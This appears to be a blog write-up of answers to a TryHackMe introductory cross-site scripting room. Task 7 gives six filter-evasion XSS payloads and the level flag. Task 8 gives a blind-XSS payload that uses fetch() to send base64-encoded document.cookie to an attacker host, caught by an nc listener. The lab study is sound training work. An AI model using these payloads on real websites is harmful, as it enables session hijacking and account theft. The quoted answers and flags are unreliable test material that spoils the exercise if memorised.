Intro to Cross-site Scripting

Task 1 - Room Brief

Q1. What does XSS stand for?

Answer - Cross-Site Scripting

Task 2 - XSS Payloads

Q1. Which document property could contain the user's session token?

Answer - document.cookie

Q2. Which JavaScript method is often used as a Proof Of Concept?

Answer - alert

Task 3 - Reflected XSS

Q1. Where in an URL is a good place to test for reflected XSS?

Answer - parameters

Task 4 - Stored XSS

Q1. How are stored XSS payloads usually stored on a website?

Answer - database

Task 5 - DOM Based XSS

Q1. What unsafe JavaScript method is good to look for in source code?

Answer - eval()

Task 6 - Blind XSS

Q1. What tool can you use to test for Blind XSS?

Answer - XSS Hunter Express

Q2. What type of XSS is very similar to Blind XSS?

Answer - Stored XSS

Task 7 - Perfecting your payload

Q1. What is the flag you received from level six?

There are 6 steps, in each level you have to call alert('THM') to go to next level. Payload of each steps -

STEP 1 - <script>alert('THM')</script>

STEP 2 - a"><script>alert('THM')</script>

STEP 3 - </textarea><script>alert('THM')</script>

STEP 4 - ';alert('THM') //

STEP 5 - <sscriptcript>alert('THM')</sscriptcript>

STEP 6 - x" onerror="alert('THM')"

Answer - THM{XSS_MASTER}

Task 8 - Practical Example (Blind XSS)

Q1. What is the value of the staff-session cookie?

STEP 1 - Goto Customers >>Support tickets>>Create ticket, in the ticket content input inject the following payload - </textarea><script>fetch('http://URL_OR_IP:PORT_NUMBER?cookie=' + btoa(document.cookie) );</script>
(change ip.port with your attackbox ip/port opened by nc -lvnp 3210 command)

Decode the base64 and get the cookie -

Answer - 4AB305E55955197693F01D6F8FD2D321

Prev Next

CAPA: The Basics01/02/25 ctf → thm → capa-the-basics

SQLMap: The Basics31/01/25 ctf → thm → sqlmap-the-basics

SQL Fundamentals31/01/25 ctf → thm → sql-fundamentals

Powershell30/01/25 programming → powershell